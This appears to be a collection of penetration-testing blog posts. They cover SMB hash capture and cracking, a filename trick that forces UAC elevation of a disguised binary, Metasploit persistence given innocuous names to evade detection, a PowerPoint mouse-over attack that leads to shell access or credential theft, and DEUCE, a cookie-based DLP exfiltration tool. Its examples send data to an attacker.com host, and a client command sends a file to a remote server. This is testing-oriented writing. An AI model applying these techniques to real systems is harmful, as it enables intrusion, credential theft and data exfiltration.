Your Neighborhood Online, Good or Bad Idea?

I ran across this site Nextdoor.com, it is another social media site with one difference. “Nextdoor is the private social network for you, your neighbors and your community. It's the easiest way for you and your neighbors to talk online and make all of your lives better in the real world.” The idea is that only people in your real neighborhood can join. Out of curiosity I started looking around the demo site and started to think, this sounds like a terrible idea.

However, in my opinion this starts to go wrong very fast.  A quick Google of site: nextdoor.com already starts to produce some interesting results. The first and second page reports results such as the West Briar, Pointe Marin, Covie Hill and Bent Creek. Clicking these links will take you to a login page where you can get a little more information about the neighborhood, such as the city, state and an outlined map of the neighborhood.

Figure 1

Okay, so what’s the risk? First the “bad guys” already know the city, state and the neighborhood. Another quick Google search results in finding an invite page where you enter your address and thanks to the mini map and some more Google it is easy to find an address within the outline.
  

Figure 2

The next step is an address verification page. The site requires either a credit card for checking the billing address, a mobile number they can call or they can send you a postcard in the mail. I won’t get into the other worries that some of those options might cause, but it looks like they are trying hard to protect the people using the site, but is that enough? And can it be easily circumvented?

What if someone simply gets into a valid account, (we don’t care about how at this moment it happens every day to many sites.) could an attacker use any of the data or information to their advantage. The demo site shows us that there is a lot of information ripe for the picking.

The site is a standard social media site. You have maps, an inbox, events and a neighbor’s button, the exception here is the site really wants your physical data as well and it becomes a data gatherers dream. Clicking on a user shows some useful information, obviously it is up to the user on what to display.  With the data in figure 3 an attacker could start looking to impersonate that person, or use the data to gain access other accounts via password resets or challenge questions like “what is your dog’s name, what is your oldest child’s name”  

Figure 3

As we go deeper into the site we start to see more information that could be valuable or even deadly. The personal risk you accept is huge; one of the best things about the internet is if you’re careful someone finding you in the real world is a little bit challenging.   

Figure 4

This example on the demo site shows a user asking for a baby sitter from 4-10 pm, and other users posting phone numbers to great baby sitters. This of course is incredibly helpful for the person needing the sitter. But, what does it tell the bad guys? Mom or Dad won’t be home from 4-10, the name and number of the babysitter, the kids are older most likely between the ages 7-12. That information could be valuable to any person who wants to use it to their advantage.  Did this home just become a possible target for a personal attack, a robbery, an angry boyfriend of the babysitter, or that creepy person down the street that nobody talks to? 

It is your job to decide if this information is secure, and okay for display to the public. No matter what the claims of privacy there are, assume someone you don’t want seeing this information will see it.  Above all else protect your family and yourself, and maybe just maybe actually go outside and talk to your neighbors. Finally, another important item to consider when signing up for this type of site is: Do they care about security? In looking at the current job posting they are hiring a lot of developers and none of the requirements of any of those posted are for “secure coding practices”.  Hopefully, that is asked during the interview process.

Gather Sploits: Necessity is the mother of Invention

Ever run into a test where you port scan and you just cannot remember what those ports are or if there is any vulnerabilities connected to them? Normally, I would just take the port do a search on Exploit-db.com. However, I found myself doing that a lot on this last test there were lots of weird ports.   I started by writing a page scraper for Exploit-DB, that took just a list of ports, it was a little slow. I added functionality to search the Exploit-DB CSV file that is in Backtrack or if you have the file just point the script at it. I quickly became annoyed with having to take the ports from my Nmap results and put them into a text file and then run my script.  I then found out there is an API for Exploit-DB so back to the drawing board at the end of the day the Gather Sploits script was born. 

The script simply parses an Nmap xml file grabs the host, ports and OS and runs them through either the Exploit-DB online search or locally if specified. There are some requirements though, you will need a Shodan API key you can get the instructions at http://docs.shodanhq.com/. You will also need the Shodan python libraries which you can get at https://github.com/achillean/shodan-python. Finally, you will need the code at the end of this article and python 2.7.

If the Nmap XML has the operating system (OS) detection in it the script will limit the port findings based on that OS along with the exploits that are for multiple OS’s. You can specify an OS or force all results. This script produces a lot of data, you have been warned. 

Usage is simple

Results are plenty

Code below:

Refresher Series - Capturing and cracking SMB hashes with Cain and Half-LM rainbow tables.

First things first, what is an LM Hash or Lan Manager Hash? A LM Hash is an outdated hashing function, however still widely in use in corporate environments today. The most important features of a LM hash is as follows:

·         Passwords are a Maximum of 14 characters or 14 bytes.

·         Passwords are converted to uppercase

·         Passwords are padded to 14 bytes

·         The 14 byte password is split into two 7 byte halves. (This is the weakness exploited by the Half LM attack)

·         Read more about LM hashes at http://en.wikipedia.org/wiki/LM_hash

Simply put, if a user chooses a password of ‘Password’ the LM hashing function changes it into “PASSWOR” and “D”, or if they choose “PaSSwOrD12345!” it is changed to
“PASSWOR” and “D12345!”.  Obviously cracking two short passwords will take less time than 1 long password.

Before you can use the Half-LM rainbow tables you either need to download them or generate them yourself like I did using Winrtgen which is included with Cain.  When using Winrtgen it is important to note the disk space and Success probability. This is directly influenced by the Charset and the Number of tables.  In the image below you see that the tables will only recover 97% of passwords using the alpha-numeric-symbol14 charset. You will also want to run the Benchmark to see how long it will take you to generate the tables. On a side note you can divide the tables.lst file to distribute load, even among cores as Winrtgen is not written for multicore support. Then we wait…..

On to the fun stuff, to capture a hash we want to use the Metasploit capture SMB auxiliary module, which is located in auxiliary/server/capture/smb. Leave the default settings with the exception of the CAINPWFILE. Set this to output the file where ever you like.

Now you wait, you can do various things to coerce the victims to come to you such as NetBIOS spoofing or embedding UNC paths, but that’s a topic for another day. When a user attempts to connect to the capture server you will see output similar to this. The important thing to note is that the capture contains an LM Hash.

When you’re ready you can load the hashes into Cain, by selecting the Cracker tab then the plus symbol to add your hashes from a list.

The select the hashes you want to crack and right click, selecting Cryptanalysis attack, Half-LM hashes + challenge, via Rainbow tables. 

Load your tables and let it run. The amount of running time depends on the amount of hashes.

When it is done you have a result similar to the image below. As you can see we have not recovered the actual password yet, but we’re close. Let’s finish them off.

Follow the similar procedure as above by right clicking the hashes, but this time you’re going to select brute-force attack and LM Hashes + Challenge. As you can see I set the Max length to 3, that’s because I assume that nobody picked a password over 10 characters, which is probably a pretty good assumption in this case. ;)

Remember we already cracked 7 of the characters.  As you can see the 2^nd half of the passwords are cracked extremely fast.

Cain then does a quick case brute force against the cracked password to determine its proper case, as you can see the passwords were recovered.

That’s it! It is actually simpler in practice then it appears here. Good luck and have fun.

Getting System the Lazy Way

We know all too well that many users are local administrators. We also know we can send or drop binaries to these users and they will run whatever we want them to. The attack vector can be anything really phishing, social engineering, flash drives, CD-ROMs or anything else you can imagine.  The problem lies in when they run the binary if they don’t run it as admin we may not be able to get system level access. To be honest that is the level I want and prefer to have. Take the following scenario:

We deliver our malicious binary and we disguise it as an upgrade the file is named ‘upgrade.exe’. The victim runs the upgrade and we get our shell. But it’s just a user shell. While I will take a user shell over no shell, I want system level access. 

You may be able to get system a bunch of different ways in addition to the ‘getsytem’ command. Such as the bypass UAC (user account control) and some other nice post modules.

We can easily force a user to run a file as admin by simply altering the filename. If we change ‘upgrade.exe’ to ‘update.exe’ windows automatically makes you run it as administrator. Which is you can tell by the UAC logo now on top of the executable.

If the user decided to run it now we will be able to get system level access without much more effort as seen below.

What’s interesting is the filename can be many different things and it only has to contain the words the format doesn't matter. Meaning it could be local_update.exe or test-update. There are also other keywords such as:

• install
• instal
• installer
• setup
• patch
• update

I am sure there are others but I will leave it up to you to find them. The other interesting thing is these keywords don’t have to exist in the file name they can be in the details page of the file.

The only downside is if the user is not an administrator this will prompt for administrator credentials, and that may result in you not getting any shell. But as I said in the beginning many users already run as local admin.

Metasploit Persistence

During penetration tests and red team versus blue team engagements sometimes you need your shells to always be available. Let’s say you pop a box, get your meterpreter shell which always happens right at the end of the day. You leave your shell, only to come back in the morning and find out the connection dropped because the system rebooted. Now you have to exploit all over again or worst case scenario if you used a password to compromise a system and the person changed it and now you’re stuck without a shell. That would be very sad, luckily @Carlos_Perez/Darkoperator made a persistence script that is included in Metasploit. It’s awesome too, get your shell and run persistence.

Now, if there is an unexpected reboot you will get your shell back, to clean up the shell all you need to do is run the clean up by running the multi_console_command script and point it at the cleanup file which is given to you when you run the persistence command.

One thing I found lacking though was the use of random file names. While normally that is not an issue, I found that sometimes I needed to give the files a name. Either so I could tell a point of contact ‘here is the registry key or service I created WRPIQDAHVMHJ’ also at times I felt that this string of random characters would look odd if you were trying not to get caught.

I took it upon myself to alter the built in script to suit my needs. I added functionality to the persistence script to take a new parameter ‘-N’ which allows you to specify a name for the service or registry key. If you don’t specify the switch it will just default to random.  Now you can name it whatever you want. Give it a name like Microsoft-Active-Switch or something relevant to the company and it will be harder to detect and easier to relay as information to a point of contact.  I needed the option and I hope it can be useful to you as well.

While I have written in python, I have never tried to alter a ruby script before. This was my first attempt here it is.

Attack with Power... Point that is.

There have been all kinds of document attacks, but what about PowerPoint. It turns out that PowerPoint makes it easy for an attacker to turn the innocent slideshows into a nasty little attack.  The attack involves 4 simple steps, make a slideshow, make an action, rename the file and distribute it.

First things first, you need to make a slideshow. Design it anyway you want, pick the slide or slides you want to use the action on. Make a new text box and drag the box to cover the whole page. Click on insert -> actions -> mouse over. Then click the hyperlink button and select URL. Enter the desired URL, click OK and save the PowerPoint. In figure 1 I have entered a URL that is already set up for the Java Applet attack. This can be done with Metasploit or the SocialEngineering Toolkit.

Figure 1

If we were to send this to a target as is, it would work only when they started the slide show, in an attempt to circumvent that we can rename the file from a PPT to a PPS (figures 2,3), which is a PowerPoint Slideshow. When the file is opened it starts as a full screen slide show. Since our attack is launched via a mouse over, when the user attempts to close the document the odds are they will trigger the attack.

Figure 2

Figure 3

At this point our malicious web page is opened, and the Java Applet attack commences, as seen below.

The user may not even be aware that they triggered the webpage to open; it might be beneficial to have the page appear to be a common webpage such as Gmail or Facebook. If the target decides to hit run we would be given our shell and complete control of the system as shown in figure 5.

Figure 5

I wanted to see if it was possible to embed a UNC path, turns out it is just as simple. Following the same steps as outlined above but when you select URL enter a UNC path such as \\ipaddress\a.gif and set Metasploit to use the auxiliary/server/capture/smb module for capturing your requests. As you can see from figure 6 each time the mouse passes over the target area it sends the credentials. Now all you have to do is crack them. 

Figure 6

These attacks are not new, the important part is that PowerPoint does not warn the user. There is no popup asking the user if they want to visit the site and more importantly there is absolutely no warning of the attempted authentication attempt. The user may not even know that they have fallen victim to this attack.

This attack is very difficult to detect, as this is simply using the features of PowerPoint for a malicious purpose. If this type of attack originated from a trusted individual spoofed or even a disgruntled employee it could be absolutely devastating. My advice is simple; make sure you know the sender. There is nothing wrong with making a phone call and saying “Did you send me this PowerPoint.” Also, if you notice any odd behavior after using a PowerPoint it may warrant further investigation. 

Special thanks to my wife and @_Jagar_

DEUCE: Bypassing DLP with Cookies

In a recent B-sides event, there was a talk about the exfiltration of data and Data Loss Prevention (DLP) systems. A known vector to bypass DLP, is the use of NSLookup. The attacker requests a domain he controls but adds a hostname that contains the data that needs to be sent outside the controlled environment. This means if an attacker wanted to steal a name and social security number he would request “johndoe123-45-1234.attacker.com” This request would hit the DNS server and be logged thus creating a list of identities for the attacker to mine at a later time.  The maximum limit is 255 characters for this kind of attack. This concept got me thinking what about a standard GET request such as http://attacker.com/johndoe123-45-1234 this would make life easier for the attacker. He would no longer need to control the DNS server; he would just need to see what pages were requested. We would still be limited by the character maximum and each request could be easily logged and analyzed by proxies or alerting systems.  But, let’s be honest most DLP systems are going to alert on these types of requests, or at least they should.

After some dialog with some friends, it was pointed out that using cookies would be a great alternative. Cookies aren’t normally logged by proxies or other systems. Also if the cookie was encoded or encrypted, as they normally are it would keep the DLP and prying eyes at bay.  As an added benefit we are no longer limited by the 255 character maximum and one request could send many cookies.  

This led to the need to create a tool to test this concept. Enter Data Exfiltration Using Cookie Encryption or DEUCE. DEUCE went from simple concept to a multi-encoding and encryption DLP bypass tool. The program simply takes an input file and creates a cookie for each line.  DEUCE has the ability to encrypt via AES, hash with MD5 or use a custom multi-encode with a 3 times replacement cipher.  The program then sends its data to the server, where the AES and multi-encoded options are automatically converted back to plain text. The MD5 is a one way hash that would need to be cracked. However, if an attacker sent a list of social security numbers it would only take minutes to crack the 9 digits number using a tool like Hashcat. In the Python code you can change the name of the cookie, just make sure you change it in the client and the server.

DEUCE is written in python but could easily be converted to an executable using py2exe or PyInstaller also the AES encryption relies on PyCrypto. Because this is just a proof of concept tool DEUCE does not currently support SSL, but it may in the future.

Using DEUCE is simple. By default the server listens on all interfaces and on port 80. The DEUCE client has more options such as encryption and encoding methods, target URL and input file. Example usage below: 

• python deuce_server.py -o ouput.txt
• This starts the listening server on all interfaces on port 80 with the output being output.txt

• python deuce_client.py -u http://location_of_deuce_server  -i inputfile.txt -m
• This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server using the -m tells DEUCE to use multi-encode mode.

Please feel free to test this concept in your environment; obviously I do not have access to every possible solution out there. It is important to note I am in no way responsible for how you use DEUCE. This tool is designed to help penetration testers and assist users in testing their DLP implementation. You are not permitted to use DEUCE for any illegal means.

Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake Garlie (@_Jagar_) for listening to me rant about this.

Deuce_Server

Deuce_Client